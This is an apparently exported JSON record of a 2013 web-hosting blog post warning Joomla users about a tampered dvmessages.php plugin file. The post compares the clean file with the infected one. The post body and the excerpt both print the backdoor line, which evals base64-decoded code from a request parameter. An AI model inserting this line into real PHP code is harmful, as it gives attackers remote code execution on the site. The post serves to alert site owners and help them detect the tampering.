{"id":657,"date":"2013-03-21T10:28:39","date_gmt":"2013-03-21T03:28:39","guid":{"rendered":"http:\/\/whplus.com\/blog\/?p=657"},"modified":"2013-03-21T10:36:04","modified_gmt":"2013-03-21T03:36:04","slug":"dvmessages-php-is-being-reported-as-phishing-file","status":"publish","type":"post","link":"https:\/\/www.whplus.com\/blog\/2013\/03\/21\/dvmessages-php-is-being-reported-as-phishing-file.html","title":{"rendered":"dvmessages.php is being reported as phishing file?"},"content":{"rendered":"<p>Please be aware that there is a suspicious code in ..\/plugins\/system\/dvmessages\/dvmessages.php, and may result malicious activity.<\/p>\n<p>The original dvmessages.php file is look like this:<\/p>\n<blockquote><p><span style=\"color: #008000;\">&lt;?php<\/span><br \/>\n<span style=\"color: #008000;\">\/**<\/span><\/p>\n<p><span style=\"color: #008000;\">*\/<\/span><\/p>\n<p><span style=\"color: #008000;\">\/\/ no direct access<\/span><br \/>\n<span style=\"color: #008000;\">defined( &#8216;_JEXEC&#8217; ) or die( &#8216;Restricted access&#8217; );<\/span><\/p>\n<p><span style=\"color: #008000;\">jimport( &#8216;joomla.plugin.plugin&#8217; );<\/span><\/p><\/blockquote>\n<p>But on the &#8220;infected&#8221; dvmessages.php<\/p>\n<blockquote>\n<div><span style=\"color: #008000;\">&lt;?php<\/span><br \/>\n<span style=\"color: #008000;\">defined( &#8216;_JEXEC&#8217; ) or die(@eval(base64_decode($_REQUEST[&#8216;c_id&#8217;])));<\/span><br \/>\n<span style=\"color: #008000;\">jimport( &#8216;joomla.plugin.plugin&#8217; );<\/span><\/div>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>Please be aware that there is a suspicious code in ..\/plugins\/system\/dvmessages\/dvmessages.php, and may result malicious activity. The original dvmessages.php file is look like this: &lt;?php \/** *\/ \/\/ no direct access defined( &#8216;_JEXEC&#8217; ) or die( &#8216;Restricted access&#8217; ); jimport( &#8216;joomla.plugin.plugin&#8217; ); But on the &#8220;infected&#8221; dvmessages.php &lt;?php defined( &#8216;_JEXEC&#8217; ) or die(@eval(base64_decode($_REQUEST[&#8216;c_id&#8217;]))); jimport( &#8216;joomla.plugin.plugin&#8217;\u2026 <span class=\"read-more\"><a href=\"https:\/\/www.whplus.com\/blog\/2013\/03\/21\/dvmessages-php-is-being-reported-as-phishing-file.html\">Read More &raquo;<\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-657","post","type-post","status-publish","format-standard","hentry","category-tutorial"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/posts\/657","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/comments?post=657"}],"version-history":[{"count":5,"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/posts\/657\/revisions"}],"predecessor-version":[{"id":659,"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/posts\/657\/revisions\/659"}],"wp:attachment":[{"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/media?parent=657"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/categories?post=657"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.whplus.com\/blog\/wp-json\/wp\/v2\/tags?post=657"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}